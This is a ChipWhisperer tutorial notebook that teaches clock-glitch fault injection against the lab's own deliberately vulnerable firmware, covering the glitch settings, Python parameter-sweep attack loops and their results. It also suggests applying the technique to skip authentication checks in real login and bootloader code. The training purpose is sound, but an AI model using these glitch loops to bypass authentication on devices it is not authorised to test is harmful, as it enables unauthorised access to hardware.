# Tutorial A2 Introduction to Glitch Attacks

This advanced tutorial will demonstrate clock glitch attacks using the ChipWhisperer system. This will introduce you to many required features of the ChipWhisperer system when it comes to glitching. This will be built on in later tutorials to generate voltage glitching attacks, or when you wish to attack other targets.

## Background on Clock Glitching

Digital hardware devices almost always expect some form of reliable clock. We can manipulate the clock being presented to the device to cause unintended behaviour. We'll be concentrating on microcontrollers here, however other digital devices (e.g. hardware encryption accelerators) can also have faults injected using this technique.

Consider a microcontroller first. The following figure is an excerpt the Atmel AVR ATMega328P datasheet:

![A2_1](https://wiki.newae.com/images/2/20/Mcu-unglitched.png)

Rather than loading each instruction from FLASH and performing the entire execution, the system has a pipeline to speed up the execution process. This means that an instruction is being decoded while the next one is being retrieved, as the following diagram shows:

![A2_2](https://wiki.newae.com/images/a/a5/Clock-normal.png)

But if we modify the clock, we could have a situation where the system doesn't have enough time to actually perform an instruction. Consider the following, where Execute #1 is effectively skipped. Before the system has time to actually execute it another clock edge comes, causing the microcontroller to start execution of the next instruction:

![A2_3](https://wiki.newae.com/images/1/1e/Clock-glitched.png)

This causes the microcontroller to skip an instruction. Such attacks can be immensely powerful in practice. Consider for example the following code from `linux-util-2.24`:

```C
/*
 *   auth.c -- PAM authorization code, common between chsh and chfn
 *   (c) 2012 by Cody Maloney <cmaloney@theoreticalchaos.com>
 *
 *   this program is free software.  you can redistribute it and
 *   modify it under the terms of the gnu general public license.
 *   there is no warranty.
 *
 */

#include "auth.h"
#include "pamfail.h"

int auth_pam(const char *service_name, uid_t uid, const char *username)
{
    if (uid != 0) {
        pam_handle_t *pamh = NULL;
        struct pam_conv conv = { misc_conv, NULL };
        int retcode;

        retcode = pam_start(service_name, username, &conv, &pamh);
        if (pam_fail_check(pamh, retcode))
            return FALSE;

        retcode = pam_authenticate(pamh, 0);
        if (pam_fail_check(pamh, retcode))
            return FALSE;

        retcode = pam_acct_mgmt(pamh, 0);
        if (retcode == PAM_NEW_AUTHTOK_REQD)
            retcode =
                pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK);
        if (pam_fail_check(pamh, retcode))
            return FALSE;

        retcode = pam_setcred(pamh, 0);
        if (pam_fail_check(pamh, retcode))
            return FALSE;

        pam_end(pamh, 0);
        /* no need to establish a session; this isn't a
         * session-oriented activity...  */
    }
    return TRUE;
}
```

This is the login code for the Linux OS. Note that if we could skip the check of `if (uid != 0)` and simply branch to the end, we could avoid having to enter a password. This is the power of glitch attacks - not that we are breaking encryption, but simply bypassing the entire authentication module!

## Glitch Hardware

The ChipWhisperer Glitch system uses the same synchronous methodology as it's Side Channel Analysis (SCA) capture. A system clock (which can come from either the ChipWhisperer or the Device Under Test (DUT)) is used to generate the glitches. These glitches are then inserted back into the clock, although it's possible to use the glitches alone for other purposes (i.e. for voltage glitching, EM glitching).

The generation of glitches is done with two variable phase shift modules, configured as follows:

![A2_4](https://wiki.newae.com/images/6/65/Glitchgen-phaseshift.png)

The enable line is used to determine when glitches are inserted. Glitches can be inserted continuously (useful for development) or triggered by some event. The following figure shows how the glitch can be muxd to output to the Device Under Test (DUT).

![A2_5](https://wiki.newae.com/images/c/c0/Glitchgen-mux.png)

### Hardware Support

The phase shift blocks use the Digital Clock Manager (DCM) blocks within the FPGA. These blocks have limited support for run-time configuration of parameters such as phase delay and frequency generation, and for maximum performance the configuration must be fixed at design time. The Xilinx-provided run-time adjustment can shift the phase only by about +/- 5nS in 30pS increments (exact values vary with operating conditions).

For most operating conditions this is insufficient - if attacking a target at 7.37MHz the clock cycle would have a period of 136nS. In order to provide a larger adjustment range, an advanced FPGA feature called Partial Reconfiguration (PR) is used. The PR system requires special partial bitstreams which contain modifications to the FPGA bitstream. These are stored as two files inside a "firmware" zip which contains both the FPGA bitstream along with a file called `glitchwidth.p` and a file called `glitchoffset.p`. If a lone bitstream is being loaded into the FPGA (i.e. not from the zip-file), the partial reconfiguration system is disabled, as loading incorrect partial reconfiguration files could damage the FPGA. This damage is mostly theoretical, more likely the FPGA will fail to function correctly.

If in the course of following this tutorial you find the FPGA appears to stop responding (i.e. certain features no longer work correctly), it could be the partial reconfiguration data is incorrect.

We'll look at how to interface with these features later in the tutorial.

## Setting Up Firmware

As with previous tutorials, we'll start by creating a new project from base firmware, as well as setting up our `PLATFORM` and `CRYPTO_TARGET`. This tutorial doesn't use any crypto, so we'll leave the latter option as `NONE`. This time, we'll be using `glitch-simple`:

In [1]:
%%bash
cd ../../hardware/victims/firmware/
mkdir -p glitch-simple-lab1 && cp -r glitch-simple/* $_

In [2]:
PLATFORM = "CWLITEARM"
CRYPTO_TARGET="NONE"

Now navigate to the `glitch-simple-lab1` folder and open `glitchsimple.c` in a code editor. Scroll down until you find the `glitch1()` function:

```C
void glitch1(void)
{
    led_ok(1);
    led_error(0);
    
    //Some fake variable
    volatile uint8_t a = 0;
    
    putch('A');
    
    //External trigger logic
    trigger_high();
    trigger_low();
    
    //Should be an infinite loop
    while(a != 2){
    ;
    }    
    
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);
    
    uart_puts("1234");
    
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);
    led_error(1);

    //Several loops in order to try and prevent restarting
    while(1){
    ;
    }
    while(1){
    ;
    }
    while(1){
    ;
    }
    while(1){
    ;
    }
    while(1){
    ;
    }    
}

```

We can see here that sends back an `'A'`, toggles the trigger pin, then enters an infinite loop. After the infinite loop, the device sends back `"1234"`. On boards that support it, the firmware will also activate a green "OK" LED upon entering the function and a red "ERROR" LED when a successful glitch occurs. Our objective will be to glitch past the infinite loop.

Before you build, navigate to `main()` and verify that this function is being called. Next, build the firmware:

In [12]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../../hardware/victims/firmware/glitch-simple-lab1
make PLATFORM=$1 CRYPTO_TARGET=$2

rm -f -- glitchsimple-CWLITEARM.hex
rm -f -- glitchsimple-CWLITEARM.eep
rm -f -- glitchsimple-CWLITEARM.cof
rm -f -- glitchsimple-CWLITEARM.elf
rm -f -- glitchsimple-CWLITEARM.map
rm -f -- glitchsimple-CWLITEARM.sym
rm -f -- glitchsimple-CWLITEARM.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- glitchsimple.s simpleserial.s stm32f3_hal.s stm32f3_hal_lowlevel.s stm32f3_sysmem.s
rm -f -- glitchsimple.d simpleserial.d stm32f3_hal.d stm32f3_hal_lowlevel.d stm32f3_sysmem.d
rm -f -- glitchsimple.i simpleserial.i stm32f3_hal.i stm32f3_hal_lowlevel.i stm32f3_sysmem.i
.
-------- begin --------
arm-none-eabi-gcc (15:5.4.1+svn241155-1) 5.4.1 20160919
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Compiling C: glitchsimple.c
arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -mthumb -mfloat-abi=hard -mfpu=fpv4-sp-d16 -fmessage-length=0 -ffunction

## Attack Script

### Setup

Now that we've studied the code and have an objective, we can start looking at how to control the glitch module via Python. We'll start by connecting to and setting up the ChipWhisperer, then programming it. As usual, make sure you modify `fw_path` with the path to the file you built in the last step.

In [6]:
%run "Helper Scripts/CWLite_Connect.ipynb"

In [7]:
%run "Helper Scripts/Setup_Target_Generic.ipynb"

In [8]:
# uncomment based on your target
fw_path = "../../hardware/victims/firmware/glitch-simple-lab1/glitchsimple-CWLITEARM.hex"
%run "Helper Scripts/Program_STM.ipynb"
#%run "Helper Scripts/Program_STM.ipynb"
#%run "Helper Scripts/No_Programmer.ipynb"

In [13]:
program_target(scope, fw_path)

Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to programming 4387 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 4387 bytes


Since the firmware enters an infinite loop, we'll need to reset the target between glitch attempts. Be sure to uncomment the reset pin for your target:

In [10]:
import time
def reset_target(scope):
    scope.io.nrst = 'low'
    #scope.io.pdic = 'low'
    time.sleep(0.05)
    scope.io.nrst = 'high'
    #scope.io.pdic = 'high'

Now let's make sure the firmware works as we expect. We should get `"hello\nA"` back after resetting the target.

In [15]:
scope.arm()
reset_target(scope)

ret = scope.capture()
if ret:
    print("Scope capture timed out")
num_chars = target.ser.inWaiting()
response = target.ser.read(num_chars, timeout = 10)
print(response)

 hello
A


### Glitch Module

All the settings/methods for the glitch module can be accessed under `scope.glitch`. As usual, documentation for the settings and methods can be accessed by the python `help` command:

In [ ]:
help(scope.glitch)

Some of the important settings we'll want to look at here are:

* clk_src
> The clock signal that the glitch DCM is using as input. Can be set to "target" or "clkgen" In this case, we'll be providing the clock to the target, so we'll want this set to "clkgen"
* offset
> Where in the output clock to place the glitch. Can be in the range `[-50, 50]`. Often, we'll want to try many offsets when trying to glitch a target.
* width
> How wide to make the glitch. Can be in the range `[-50, 50]`. Wider glitches more easily cause glitches, but are also more likely to crash the target, meaning we'll often want to try a range of widths when attacking a target.
* output
> The output produced by the glitch module. For clock glitching, clock_xor is often the most useful option.
* ext_offset
> The number of clock cycles after the trigger to put the glitch. 
* repeat
> The number of clock cycles to repeat the glitch for. Higher values increase the number of instructions that can be glitched, but often increase the risk of crashing the target.
* trigger_src
> How to trigger the glitch. For this tutorial, we want to automatically trigger the glitch from the trigger pin only after arming the ChipWhipserer, so we'll use `ext_single`

In addition, we'll need to tell ChipWhipserer to use the glitch module's output as a clock source for the target by setting `scope.io.hs2 = "glitch"`. We'll also setup a large `repeat` to make glitching easier. Finally, we'll also use a `namedtuple` to make looping through parameters simpler.

In [36]:
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"
scope.glitch.repeat = 105
scope.io.hs2 = "glitch"
print(scope.glitch)
from collections import namedtuple
Range = namedtuple('Range', ['min', 'max', 'step'])

clk_src     = clkgen
width       = 10.9375
width_fine  = 0
offset      = 10.546875
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 0
repeat      = 105
output      = clock_xor



### Attack Loop

#### XMEGA Settings

In [ ]:
offset_range = Range(-10, 10, 1)

#### STM/CWLITEARM Settings

In [ ]:
offset_range = Range(-49, -30, 1)
scope.glitch.ext_offset = 37
scope.glitch.repeat = 10

Now that the setup's done and we know how to use the glitch module, we can start our attack. The key parameters that we'll need to iterate through are `width` and `offset`, so we'll need some loops to change these. To know if we got a successful glitch, we'll check for "1234" in the output we get back. The rest of the loop should look familiar from our earlier code:

In [44]:
from collections import namedtuple

width_range = Range(-10, 10, 1)

scope.glitch.width = width_range.min
target.init()

data = []

while scope.glitch.width < width_range.max:
    scope.glitch.offset = offset_range.min
    while scope.glitch.offset < offset_range.max:
        # call before trace things here

        # flush the garbage from the computer's target read buffer
        target.ser.flush()

        # run aux stuff that should run before the scope arms here

        scope.arm()
        reset_target(scope)

        timeout = 50
        # wait for target to finish
        while target.isDone() is False and timeout:
            timeout -= 1
            time.sleep(0.01)

        try:
            ret = scope.capture()
            if ret:
                print('Timeout happened during acquisition')
        except IOError as e:
            print('IOError: %s' % str(e))

        # get the results from the scope
        # read from the targets buffer
        num_chars = target.ser.inWaiting()
        response = target.ser.read(num_chars, timeout = 10)

        # for table display purposes
        success = '1234' in repr(response) # check for glitch success (depends on targets active firmware)
        data.append([repr(response), scope.glitch.width, scope.glitch.offset, success]) 
        # run aux stuff that should happen after trace here
        scope.glitch.offset += offset_range.step
    scope.glitch.width += width_range.step

print("Done glitching")


Done glitching


Now that we've tried some glitches, let's look at the results:

In [45]:
print(scope.adc.trig_count)
for row in data:
    print(row)

56
["'\\x00hello\\nA'", -10.15625, -48.828125, False]
["'\\x00hello\\nA'", -10.15625, -47.65625, False]
["'\\x00hello\\nA'", -10.15625, -46.484375, False]
["'\\x00hello\\nA'", -10.15625, -45.3125, False]
["'\\x00hello\\nA'", -10.15625, -44.140625, False]
["'\\x00hello\\nA'", -10.15625, -42.96875, False]
["'\\x00hello\\nA'", -10.15625, -41.796875, False]
["'\\x00hello\\nA'", -10.15625, -40.625, False]
["'\\x00hello\\nA'", -10.15625, -39.453125, False]
["'\\x00hello\\nA'", -10.15625, -38.28125, False]
["'\\x00hello\\nA'", -10.15625, -37.109375, False]
["'\\x00hello\\nA'", -10.15625, -35.9375, False]
["'\\x00hello\\nA'", -10.15625, -34.765625, False]
["'\\x00hello\\nA'", -10.15625, -33.59375, False]
["'\\x00hello\\nA'", -10.15625, -32.421875, False]
["'\\x00hello\\nA'", -10.15625, -31.25, False]
["'\\x00hello\\nA'", -10.15625, -30.078125, False]
["'\\x00hello\\nA'", -8.984375, -48.828125, False]
["'\\x00hello\\nA'", -8.984375, -47.65625, False]
["'\\x00hello\\nA'", -8.984375, -46.484375, 

With any luck, you'll have some successful glitches. You may want to run this a few times and keep track of successful glitch parameters, as `width` and `offset` parameters for one attack often work for other ones. If you didn't get any successful glitches, note that we only used an `offset` of `[-10,10]` (the max is `[-50, 50]`. Try using a larger range of offsets to see if a successful offset lies outside of this range.

If you want to take this attack further, you may want to try reducing the `repeat` to 1 and iterating through `ext_offset` to look for the precise clock cycle where the glitch succeeds. To save time, you may want to pick a `width` and `offset` that worked for you and only vary `ext_offset`. Note that even with the right parameters and location, inserting a glitch won't always work, so a better strategy may be to loop infinitely over `ext_offset` values until you get a successful glitch.

**HINT: We used a `repeat` of 105 for this attack (and an `ext_offset` of 0) on XMEGA, which put a glitch in each of the first 105 clock cycles. This means `ext_offset` must be in the range `[0,105]` for this target.**

## Attack 2

Now that you (hopefully) have parameters that cause semi-reliable glitches, we can look at a more challenging example: a password check. Go back to `glitchsimple.c` and find the `glitch3()` function:

```C
void glitch3(void)
{
    char inp[16];
    char c = 'A';
    unsigned char cnt = 0;
    uart_puts("Password:");

    while((c != '\n') & (cnt < 16)){
        c = getch();
        inp[cnt] = c;
        cnt++;
    }

    char passwd[] = "touch";
    char passok = 1;

    trigger_high();
    trigger_low();

    //Simple test - doesn't check for too-long password!
    for(cnt = 0; cnt < 5; cnt++){
        if (inp[cnt] != passwd[cnt]){
            passok = 0;
        }
    }

    if (!passok){
        uart_puts("Denied\n");
    } else {
        uart_puts("Welcome\n");
    }
}
```

As you might expect, we'll try to glitch past the `if(!passok)` check towards the end of the code. Change `main()` to call `glitch3()`. Like before, we'll build and program the new firmware.

In [46]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../../hardware/victims/firmware/glitch-simple-lab1
make PLATFORM=$1 CRYPTO_TARGET=$2

rm -f -- glitchsimple-CWLITEARM.hex
rm -f -- glitchsimple-CWLITEARM.eep
rm -f -- glitchsimple-CWLITEARM.cof
rm -f -- glitchsimple-CWLITEARM.elf
rm -f -- glitchsimple-CWLITEARM.map
rm -f -- glitchsimple-CWLITEARM.sym
rm -f -- glitchsimple-CWLITEARM.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- glitchsimple.s simpleserial.s stm32f3_hal.s stm32f3_hal_lowlevel.s stm32f3_sysmem.s
rm -f -- glitchsimple.d simpleserial.d stm32f3_hal.d stm32f3_hal_lowlevel.d stm32f3_sysmem.d
rm -f -- glitchsimple.i simpleserial.i stm32f3_hal.i stm32f3_hal_lowlevel.i stm32f3_sysmem.i
.
-------- begin --------
arm-none-eabi-gcc (15:5.4.1+svn241155-1) 5.4.1 20160919
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Compiling C: glitchsimple.c
arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -mthumb -mfloat-abi=hard -mfpu=fpv4-sp-d16 -fmessage-length=0 -ffunction

In [47]:
program_target(scope, fw_path)

Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to programming 4555 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 4555 bytes


Now let's make sure we can communicate with the password check with a successful password:

In [48]:
scope.arm()
target.ser.write("touch\n")

ret = scope.capture()
if ret:
    print("Scope capture timed out")
num_chars = target.ser.inWaiting()
response = target.ser.read(num_chars, timeout = 10)
print(response)

 hello
Password:Welcome
Password:


and an unsuccessful one:

In [49]:
scope.arm()
target.ser.write("x\n")

ret = scope.capture()
if ret:
    print("Scope capture timed out")
num_chars = target.ser.inWaiting()
response = target.ser.read(num_chars, timeout = 10)
print(response)

Denied
Password:


Let's make some small modifications to our previous glitch loop. We no longer have to reset the target each round. We'll also need to send our password check each time.

Since we no longer are resetting the target each attempt, we also have to handle when the device crashes. To do this, we'll reset the target if the capture times out.

In [56]:
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"
scope.glitch.repeat = 1
scope.io.hs2 = "glitch"

ext_range = Range(37, 300, 1)

scope.glitch.width = width_range.min
target.init()

data = []
scope.glitch.offset = -40
scope.glitch.width = -5.5

print(scope.glitch)

#while scope.glitch.width < width_range.max:
while True:
    #scope.glitch.offset = offset_range.min
    scope.glitch.ext_offset = ext_range.min
    #while scope.glitch.offset < offset_range.max:
    while scope.glitch.ext_offset < ext_range.max:
        # call before trace things here

        # flush the garbage from the computer's target read buffer
        target.ser.flush()

        # run aux stuff that should run before the scope arms here

        scope.arm()
        target.ser.write("x\n")
        
        timeout = 50
        # wait for target to finish
        while target.isDone() is False and timeout:
            timeout -= 1
            time.sleep(0.01)

        try:
            ret = scope.capture()
            if ret:
                print('Timeout happened during acquisition')
                reset_target(scope)
        except IOError as e:
            print('IOError: %s' % str(e))

        # get the results from the scope
        # read from the targets buffer
        num_chars = target.ser.inWaiting()
        response = target.ser.read(num_chars, timeout = 10)

        # for table display purposes
        success = 'Welcome' in repr(response) # check for glitch success (depends on targets active firmware)
        if success:
            print("Offset: {}".format(scope.glitch.ext_offset))
            while True:
                pass
        data.append([repr(response), scope.glitch.width, scope.glitch.offset, success]) 
        # run aux stuff that should happen after trace here
        #scope.glitch.offset += offset_range.step
        scope.glitch.ext_offset += ext_range.step
    #scope.glitch.width += width_range.step

print("Done glitching")

clk_src     = clkgen
width       = 10.9375
width_fine  = 0
offset      = -28.90625
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 37
repeat      = 1
output      = clock_xor



Timeout happened during acquisition


Timeout happened during acquisition


Timeout happened during acquisition


Timeout happened during acquisition


...

Timeout happened during acquisition


Timeout happened during acquisition


Timeout happened during acquisition


Timeout happened during acquisition


KeyboardInterrupt: 

In [54]:
for row in data:
    print(row)

["'\\x00hello\\nPassword:'", -10.15625, -48.828125, False]
["''", -10.15625, -47.65625, False]
["'\\x00hello\\nPassword:'", -10.15625, -46.484375, False]
["''", -10.15625, -45.3125, False]
["'\\x00hello\\nPassword:'", -10.15625, -44.140625, False]
["''", -10.15625, -42.96875, False]
["'\\x00hello\\nPassword:'", -10.15625, -41.796875, False]
["'enied\\nPassword:'", -10.15625, -40.625, False]
["''", -10.15625, -39.453125, False]
["'\\x00hello\\nPassword:'", -10.15625, -38.28125, False]
["'\\x13'", -10.15625, -37.109375, False]
["'\\x00hello\\nPassword:'", -10.15625, -35.9375, False]
["'Denied\\nPassword:'", -10.15625, -34.765625, False]
["'Denied\\nPassword:'", -10.15625, -33.59375, False]
["'Denied\\nPassword:'", -10.15625, -32.421875, False]
["'Denied\\nPassword:'", -10.15625, -31.25, False]
["'Denied\\nPassword:'", -10.15625, -30.078125, False]
["''", -8.984375, -48.828125, False]
["'\\x00hello\\nPassword:'", -8.984375, -47.65625, False]
["''", -8.984375, -46.484375, False]
["'\\x00he

With any luck, you should have some successful attacks. Like with the previous attack, we used a rather large `repeat` value. See if you can reduce the `repeat` to 1 and change `ext_offset` to find exactly where the glitch needs to be inserted.

With the tutorial now over, we should disconnect from the ChipWhisperer

In [ ]:
scope.dis()
target.dis()

## Glitching Onward

This basic tutorial has introduced you to glitch attacks. They are a powerful tool for bypassing authentication in embedded hardware devices. There are many ways to expand your knowledge with additional practice, such as:

* Manual glitches can be triggered by calling `scope.glitch.manualTrigger()` and `scope.glitch.trigger_src = "manual"`. Try using manual glitches to simply glitch past the prompt in `glitch3()`.
* Completing Tutorial A3 VCC Glitch Attacks, which introduces glitching via voltage instead of the clock.
* Download some example source code (bootloaders, login prompts, etc) and port them to your target. See how you can glitch past security checks.
* Use one of the IO triggers discussed in Tutorial_A1_Synchronization_to_Communication_Lines.